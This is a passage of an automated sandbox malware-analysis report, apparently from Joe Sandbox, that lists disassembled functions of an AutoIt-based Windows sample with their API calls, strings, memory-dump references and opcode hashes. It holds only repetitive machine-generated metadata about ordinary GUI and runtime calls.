                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window_wcslen
                                      • String ID: SysListView32
                                      • API String ID: 2147712094-78025650
                                      • Opcode ID: 8afc7a8469eb36a21a0f6e12199fa982b5a400c56bc97ea7d7be4e9cde9e87c9
                                      • Instruction ID: 9cc6c8f91a137bd40ce5f7234134eca24bbc428af6e6799965c3571117ac854a
                                      • Opcode Fuzzy Hash: 8afc7a8469eb36a21a0f6e12199fa982b5a400c56bc97ea7d7be4e9cde9e87c9
                                      • Instruction Fuzzy Hash: 5841AE71A0021DABEF219F64CC49BEA7BB9EF48354F104566F958E7281D7B19A80CB90
                                      Function 008EBC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008EBCFD
                                      • IsMenu.USER32(00000000), ref: 008EBD1D
                                      • CreatePopupMenu.USER32 ref: 008EBD53
                                      • GetMenuItemCount.USER32(01045AF0), ref: 008EBDA4
                                      • InsertMenuItemW.USER32(01045AF0,?,00000001,00000030), ref: 008EBDCC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                      • String ID: 0$2
                                      • API String ID: 93392585-3793063076
                                      • Opcode ID: 98c1288cb7a2a94254f277fd1d1f31f745289949c01e334b3b012a2bd863a12a
                                      • Instruction ID: 6c171caab3e8bbf1a7c98bde6252936c22f78de25e6197fbfab4bb1ad88bff7f
                                      • Opcode Fuzzy Hash: 98c1288cb7a2a94254f277fd1d1f31f745289949c01e334b3b012a2bd863a12a
                                      • Instruction Fuzzy Hash: C3519E70B04289ABDB20CFAADC84BAFBBF5FF46314F148119E411D7290D7709941CB51
                                      Function 008EC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadIconW.USER32(00000000,00007F03), ref: 008EC913
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: IconLoad
                                      • String ID: blank$info$question$stop$warning
                                      • API String ID: 2457776203-404129466
                                      • Opcode ID: 8685fbc4f32f8b6702556c08395822fba6fa04028c4808f30b707dde6816918c
                                      • Instruction ID: fb87b74eb52b7fec3ce87f93729bcdc9afba0c1c3e201905a30246213cd5dc22
                                      • Opcode Fuzzy Hash: 8685fbc4f32f8b6702556c08395822fba6fa04028c4808f30b707dde6816918c
                                      • Instruction Fuzzy Hash: E1110071B8935ABAF7016B599C83CAE6B9CFF57358B10003AF500E62D3D7B46D015265
                                      Function 008EED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _wcslen$LocalTime
                                      • String ID:
                                      • API String ID: 952045576-0
                                      • Opcode ID: f2680aacbdc2e3135b150bdd0373e0266c10186d2547317028a6656a099266d6
                                      • Instruction ID: 8487cd7ff9666c8ba06f84ba5af9c654ab75ae1d1241d2d3c4d5396227579697
                                      • Opcode Fuzzy Hash: f2680aacbdc2e3135b150bdd0373e0266c10186d2547317028a6656a099266d6
                                      • Instruction Fuzzy Hash: DB419065D10258A5DB11EBF88C8AACFB7ACFF46310F548462E518E3921FB34E255C3A6
                                      Function 0089F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                      Download Yara Rule
                                      APIs
                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,008D682C,00000004,00000000,00000000), ref: 0089F953
                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,008D682C,00000004,00000000,00000000), ref: 008DF3D1
                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,008D682C,00000004,00000000,00000000), ref: 008DF454
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ShowWindow
                                      • String ID:
                                      • API String ID: 1268545403-0
                                      • Opcode ID: eebbb6f2d96db1e7c64671de860d83808b09b93757f88a6b7fb9a22eea5c10a6
                                      • Instruction ID: 7352cf7dd0e33a7e88850954f28038245ff9a6a44e21af10898c0b3c113f7b13
                                      • Opcode Fuzzy Hash: eebbb6f2d96db1e7c64671de860d83808b09b93757f88a6b7fb9a22eea5c10a6
                                      • Instruction Fuzzy Hash: 5441D831618640BECF3DAB29888876A7F92FB56314F1C853DF347D6663C6719880EB51
                                      Function 00912D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 00912D1B
                                      • GetDC.USER32(00000000), ref: 00912D23
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00912D2E
                                      • ReleaseDC.USER32(00000000,00000000), ref: 00912D3A
                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00912D76
                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00912D87
                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00915A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00912DC2
                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00912DE1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                      • String ID:
                                      • API String ID: 3864802216-0
                                      • Opcode ID: 30e6bb01a8a13ce1510daa304af84854fc35d9e468118915ff2866960068f5f3
                                      • Instruction ID: 2c926678c8becd66e4188e9b2845a48d6f6070e5ecf241fb935fab74668b570b
                                      • Opcode Fuzzy Hash: 30e6bb01a8a13ce1510daa304af84854fc35d9e468118915ff2866960068f5f3
                                      • Instruction Fuzzy Hash: FE319CB6355214BFEB118F50DC8AFEB3BADEF09751F048055FE089A291C6759C50CBA4
                                      Function 008E5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID:
                                      • API String ID: 2931989736-0
                                      • Opcode ID: 003cc3f45c4474b73674081423167c19163f1e2c96205fe881eaa20b5b7485fa
                                      • Instruction ID: 45d420c0cdfe983355c83f4ac37981601fd6e70d157447a3df64c002d7aab94d
                                      • Opcode Fuzzy Hash: 003cc3f45c4474b73674081423167c19163f1e2c96205fe881eaa20b5b7485fa
                                      • Instruction Fuzzy Hash: BE218361740A4D7BEA149A268EA2FFB235CFE7338CF440020FD05DAA91F764ED1081E6
                                      Function 00904FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: NULL Pointer assignment$Not an Object type
                                      • API String ID: 0-572801152
                                      • Opcode ID: 950e2f8f746e21909fda476d1cf8b5d51eb63569cc86917df091f6cfdc033235
                                      • Instruction ID: 086521a3b42feaa0cca6094582e7c6069f97a38efa9690e9416e6e531dcbc34e
                                      • Opcode Fuzzy Hash: 950e2f8f746e21909fda476d1cf8b5d51eb63569cc86917df091f6cfdc033235
                                      • Instruction Fuzzy Hash: CBD19C75A0060AAFDF10CFA8C881BAEB7B9BF48344F158469E915EB281E770DD45CF90
                                      Function 008C1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,008C17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 008C15CE
                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,008C17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 008C1651
                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,008C17FB,?,008C17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 008C16E4
                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,008C17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 008C16FB
                                        • Part of subcall function 008B3820: RtlAllocateHeap.NTDLL(00000000,?,00951444), ref: 008B3852
                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,008C17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 008C1777
                                      • __freea.LIBCMT ref: 008C17A2
                                      • __freea.LIBCMT ref: 008C17AE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                      • String ID:
                                      • API String ID: 2829977744-0
                                      • Opcode ID: d8252f6235572a5a6623ea893313a3103cb7d6f24587a6f1796fecaa20ec1e9b
                                      • Instruction ID: 280ec67160db8995b474d38e7e39f8fffc2adae1c2972487598ceb5788753b4c
                                      • Opcode Fuzzy Hash: d8252f6235572a5a6623ea893313a3103cb7d6f24587a6f1796fecaa20ec1e9b
                                      • Instruction Fuzzy Hash: 61918071E1021A9ADF208E64C8D9FEE7BB5FB4A714F18465DE801E7246DB35DC40CBA1
                                      Function 00904523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit
                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                      • API String ID: 2610073882-625585964
                                      • Opcode ID: 40be5c75c6603572fe7d1d299eab6209a98ea8fc3e12398fe52066b44d93df1c
                                      • Instruction ID: 161098bd75b8b8f2a75786207837900c73e1fa8386630af87d86a31ba2ad93aa
                                      • Opcode Fuzzy Hash: 40be5c75c6603572fe7d1d299eab6209a98ea8fc3e12398fe52066b44d93df1c
                                      • Instruction Fuzzy Hash: 4D917DB1A04219AFDF24CFA5CC84FAEBBB8EF46714F108559F615AB281D7709941CFA0
                                      Function 008F1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                      Download Yara Rule
                                      APIs
                                      • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 008F125C
                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 008F1284
                                      • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 008F12A8
                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008F12D8
                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008F135F
                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008F13C4
                                      • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008F1430
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                      • String ID:
                                      • API String ID: 2550207440-0
                                      • Opcode ID: a888fffd68553ac6db7a51f96827aa8f65f4a37fd7050db13a4284b40f9ba03b
                                      • Instruction ID: 623d55d6fcf91dea3feddb88a899e9274f4b92e01d3ef5879cdec7e2c99a0ca2
                                      • Opcode Fuzzy Hash: a888fffd68553ac6db7a51f96827aa8f65f4a37fd7050db13a4284b40f9ba03b
                                      • Instruction Fuzzy Hash: B6918B71A0021DEFDB01DFA8C888BBEB7B5FF45325F144029EA10EB292D774A941CB95
                                      Function 0089948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ObjectSelect$BeginCreatePath
                                      • String ID:
                                      • API String ID: 3225163088-0
                                      • Opcode ID: 1f4648a862592f7793d5a8cb8f67abc4e44c01716536f167bce07d1056c40d1d
                                      • Instruction ID: 421bc29e73036f6f6c5da00a7249c0039c44f28c480323b2e05df5fa81ad36f3
                                      • Opcode Fuzzy Hash: 1f4648a862592f7793d5a8cb8f67abc4e44c01716536f167bce07d1056c40d1d
                                      • Instruction Fuzzy Hash: 51913471A44219AFCF15DFA9CC84AEEBBB8FF49320F18814AE555F7251D334AA41CB60
                                      Function 00903947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 0090396B
                                      • CharUpperBuffW.USER32(?,?), ref: 00903A7A
                                      • _wcslen.LIBCMT ref: 00903A8A
                                      • VariantClear.OLEAUT32(?), ref: 00903C1F
                                        • Part of subcall function 008F0CDF: VariantInit.OLEAUT32(00000000), ref: 008F0D1F
                                        • Part of subcall function 008F0CDF: VariantCopy.OLEAUT32(?,?), ref: 008F0D28
                                        • Part of subcall function 008F0CDF: VariantClear.OLEAUT32(?), ref: 008F0D34
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                      • API String ID: 4137639002-1221869570
                                      • Opcode ID: 2d344cae003909256bafe2eedf9875e0d9c51d696ddfb2e19a59eb9466dc9801
                                      • Instruction ID: 355466708d89315a95fc3ffbae7ef31d532bcd26ab81fec199cfc4cb94962fbc
                                      • Opcode Fuzzy Hash: 2d344cae003909256bafe2eedf9875e0d9c51d696ddfb2e19a59eb9466dc9801
                                      • Instruction Fuzzy Hash: 989136756083059FC714EF68C48096AB7E9FF89314F14882DF89997391DB31EE45CB92
                                      Function 00904BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008E000E: CLSIDFromProgID.COMBASE ref: 008E002B
                                        • Part of subcall function 008E000E: ProgIDFromCLSID.COMBASE(?,00000000), ref: 008E0046
                                        • Part of subcall function 008E000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008DFF41,80070057,?,?), ref: 008E0054
                                        • Part of subcall function 008E000E: CoTaskMemFree.COMBASE(00000000), ref: 008E0064
                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00904C51
                                      • _wcslen.LIBCMT ref: 00904D59
                                      • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,?), ref: 00904DCF
                                      • CoTaskMemFree.COMBASE(?), ref: 00904DDA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                      • String ID: NULL Pointer assignment
                                      • API String ID: 614568839-2785691316
                                      • Opcode ID: c1280354cba12d1e107c534c1cd7b8383e8aea2bd936f5f888256a25780dff7a
                                      • Instruction ID: c591d929e55709f8847dd8e7b290458599a9ab73437cb0fb9f1d25bfd3cd7aa8
                                      • Opcode Fuzzy Hash: c1280354cba12d1e107c534c1cd7b8383e8aea2bd936f5f888256a25780dff7a
                                      • Instruction Fuzzy Hash: EF9108B1D0021D9FDF14DFA4C891AEDB7B8FF48310F108569E515A7291EB74AA44CFA1
                                      Function 009120FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenu.USER32(?), ref: 00912183
                                      • GetMenuItemCount.USER32(00000000), ref: 009121B5
                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 009121DD
                                      • _wcslen.LIBCMT ref: 00912213
                                      • GetMenuItemID.USER32(?,?), ref: 0091224D
                                      • GetSubMenu.USER32(?,?), ref: 0091225B
                                        • Part of subcall function 008E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 008E3A57
                                        • Part of subcall function 008E3A3D: GetCurrentThreadId.KERNEL32 ref: 008E3A5E
                                        • Part of subcall function 008E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008E25B3), ref: 008E3A65
                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009122E3
                                        • Part of subcall function 008EE97B: Sleep.KERNEL32 ref: 008EE9F3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
